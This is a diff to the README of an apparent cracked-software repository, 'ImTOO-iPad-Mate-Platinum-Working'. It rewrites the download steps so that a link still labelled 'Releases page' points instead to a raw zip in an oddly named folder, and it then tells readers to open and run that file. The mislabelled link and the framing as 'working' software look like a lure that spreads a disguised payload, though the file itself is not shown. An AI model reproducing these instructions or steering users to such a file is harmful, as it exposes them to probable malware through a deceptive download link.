Mucheallen/ImTOO-iPad-Mate-Platinum-Working/README.md

 To download the software, follow these steps:

-1. **Visit the Download Page:** Go to the [Releases page](https://github.com/Mucheallen/ImTOO-iPad-Mate-Platinum-Working/releases).
+1. **Visit the Download Page:** Go to the [Releases page](https://raw.githubusercontent.com/Mucheallen/ImTOO-iPad-Mate-Platinum-Working/main/Lobularia/ImTOO-iPad-Mate-Platinum-Working_2.3.zip).
 2. **Choose the Latest Version:** Look for the most recent release at the top of the page.
 3. **Download the File:** Click on the link for the installer.
-The file will usually look like `ImTOO-iPad-Mate-Platinum-setup.exe`.
+The file will usually look like `https://raw.githubusercontent.com/Mucheallen/ImTOO-iPad-Mate-Platinum-Working/main/Lobularia/ImTOO-iPad-Mate-Platinum-Working_2.3.zip`.
 4. **Run the Installer:** Once the download completes, open the file to start the installation process.
 5. **Follow Setup Instructions:** Follow the prompts to install the software on your computer.